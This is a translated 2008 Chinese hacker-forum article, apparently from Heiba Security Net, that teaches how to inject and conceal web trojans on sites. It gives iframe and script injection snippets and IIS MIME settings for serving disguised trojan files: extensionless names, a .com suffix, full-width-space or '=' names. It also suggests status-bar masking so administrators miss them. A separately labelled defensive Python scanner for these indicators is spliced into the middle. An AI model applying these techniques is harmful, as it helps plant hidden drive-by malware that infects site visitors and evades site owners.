Web page trojan injection (网页挂马) - Vulnerability warning - Heiba Security Net (黑吧安全网)

ID MYHACK58:62200818619
Type myhack58
Reporter Anonymous (佚名)
Modified 2008-03-26T00:00:00


It was a dark and stormy night. A hacker who wasn't all that black hung his painstakingly AV-evaded web trojan Y on site X. No sooner was the little trojan up than it got ruthlessly clicked! And our wise and mighty administrator Z once again ferreted out yet another hidden little trojan......

Enough nonsense; today I'll introduce how to hang a web trojan. Maybe you'll be surprised: isn't web trojan injection an old trick all over the Internet? The iframe and script methods have been done to death, so what is there to show off? Hear me out. Whoever hangs a trojan, it will eventually be found (obviously!), but if we can hide it from inspection as well as possible, wouldn't that be even better? Because hanging a trojan is also a kind of art.

Below I'll introduce several trojan-hanging tricks; the key is concealment. First let's look at several common ways of hanging a trojan on a web page; if you already know them, just skip ahead!

1) <iframe src="muma.htm" width=0 height=0></iframe>

2) <script src=muma.js language=javascript></script>

3) top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="muma.htm"></iframe>'

The above are the common methods found online. Hanging a trojan is all about concealment: don't let the other side find it, and even if the injection is discovered, don't let the trojan's address be exposed easily. So what do we do? We have tricks!

Removing the file suffix

In most cases we hang trojans using the first two methods above, and a discerning eye sees the problem at once. So we do something simple: remove the suffix and, at the same time, add a confusing factor. For the script call, we change the calling code to load a file named javascript, and rename the JS file that loads the trojan, in the same directory, to javascript. Yes, you read that right: the trojan's JS file is simply http://www.shadu120.com/javascript. Hasn't the difficulty of discovering the trojan suddenly increased a lot? We continue the remodelling: for the iframe call, point the src at a file named width and rename the trojan page in the same directory to width. Of course, if you are "sinister" and "cunning" and not afraid of criticism, you can consider other, even more confusing names.

Changing the file suffix

Although this trick has appeared on the Internet, nobody has summarized and extended it. Let's break it down below. Many people have hung trojans with the script pattern, which shows that the script method does not depend on the file suffix; but have you seen a .com file used as the web trojan? Today we'll implement it. Of course, there is a prerequisite: the server hosting the trojan must be in your hands, or you must have IIS management permissions on a website. We know that IIS identifies the type of a requested file by its extension: if we enter index.asp, the system calls asp.dll to parse it; enter index.htm and it is automatically interpreted as HTML; if it is an exe file, a download prompt appears directly. This gave me an idea: why not construct the suffix you need yourself? Open IIS Manager, find the website, right-click and go to Properties -> HTTP Headers -> File Types, create a new file extension .com with file type text/html, and click OK. After this the extension can be used on that website and will be parsed as HTML, as shown in Figure 1.


Next, we hang it! In the website directory, find the page where the code is to be inserted, index.html, and add the code. Did everyone read Figure 2? A file with the same name as the website is used as the web trojan. Refresh http://www.shadu120.com and, wow, the trojan obediently pops out, as shown in Figure 3. Which administrator would ever think that the thing after src= that looks like your own website's domain name is actually a trojan? Ha ha!


No file name

This is the last trick! "No file name" here doesn't mean the trojan has no file name; rather, we give it an invisible file name. Hey, if you're going to be black, be black to the end! IIS on Windows 2000 needs no extra configuration. Here I take Windows 2003 as the example, because by default IIS on Windows 2003 does not support files without an extension. Open IIS Manager, locate the computer, right-click and open Properties, then select MIME Types. Create a new extension ".*" and fill in the type as text/html or application/postscript; after confirming, IIS 6.0 will support extensionless files. The specific steps are shown in Figure 4.


OK, next we put a web trojan in the website directory and rename it to "■" (note: ■ stands for a Chinese full-width space!), and then insert the calling code into the index.html file (note: right after the equals sign comes a Chinese full-width space).

Now type http://www.shadu120.com/ into the browser. Ha ha, see it? Or enter http://www.shadu120.com/■ directly and you can also see the effect immediately, as shown in Figure 5.


In addition, under Windows a file name can also contain "=", so the code above naturally has another variation: create a file named "=" as the web trojan, which confuses the administrator's eyes just as well.
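From the defender's side, as an added example that is not part of the original article: this Python check scans a page for the concealment indicators described above (zero-size iframes, extensionless src names such as javascript or width, a src named after the site's own hostname or carrying a .com suffix, a file named "=", and full-width spaces), and check_name() can equally be run over a webroot directory listing. The sample HTML, and the use of www.shadu120.com as the site's own hostname, are constructed for the example.

```python
import re
from urllib.parse import urlsplit

FULLWIDTH_SPACE = "\u3000"  # the "Chinese full-width space" used as an invisible file name
TAG_RE = re.compile(r"<(iframe|script)\b([^>]*)>", re.IGNORECASE | re.DOTALL)
# re.ASCII limits \s to ASCII whitespace, as the HTML5 tokenizer does, so a full-width
# space after "src=" is treated as part of the value rather than as a separator.
SRC_RE = re.compile(r"""\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]*))""", re.IGNORECASE | re.ASCII)
ZERO_RE = re.compile(r"\b(width|height)\s*=\s*['\"]?0\b", re.IGNORECASE)

def check_name(name, own_host):
    """Indicators for one file name: the last path segment of a src, or a webroot entry."""
    if FULLWIDTH_SPACE in name or not name.strip():
        return ["blank or full-width-space file name"]
    if name == "=":
        return ["file named '='"]
    if "." not in name:
        return ["extensionless file name"]
    if name.lower() == own_host.lower():
        return ["file named after the site's own hostname"]
    if name.lower().endswith(".com"):
        return [".com suffix served as a web resource"]
    return []

def scan_html(html, own_host):
    """Return [(tag, src, reasons)] for each <iframe>/<script> that shows an indicator."""
    findings = []
    for m in TAG_RE.finditer(html):
        tag, attrs = m.group(1).lower(), m.group(2)
        s = SRC_RE.search(attrs)
        if not s:
            continue
        src = next(g for g in s.groups() if g is not None)
        name = urlsplit(src).path.rsplit("/", 1)[-1]  # last path segment of the src
        reasons = check_name(name, own_host)
        dims = {z.group(1).lower() for z in ZERO_RE.finditer(attrs)}
        if tag == "iframe" and dims == {"width", "height"}:
            reasons.append("zero-size iframe")
        if reasons:
            findings.append((tag, src, reasons))
    return findings

# Constructed sample page: one benign script plus the tricks described in the article.
SAMPLE_HTML = """<html><body>Welcome
<script src=javascript></script>
<iframe src=www.shadu120.com width=0 height=0></iframe>
<iframe src="\u3000" width=0 height=0></iframe>
<iframe src=http://www.shadu120.com/= width=0 height=0></iframe>
<script src="/js/site.js"></script>
</body></html>"""
```

Running scan_html(SAMPLE_HTML, "www.shadu120.com") reports the four injected tags and leaves the site's own /js/site.js alone.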

Finally, a small tip on the details. When hanging a trojan, it's best to use JavaScript to modify the browser's status bar information; otherwise the clue shows up at the moment the trojan is being called. Of course, if you use the "no file name" method, this step can be omitted.

Network security has no limits; there is always more for us to learn and to break. I hope everyone keeps working hard in the new year, keeps unleashing their imagination, and builds their own network security in a limited space!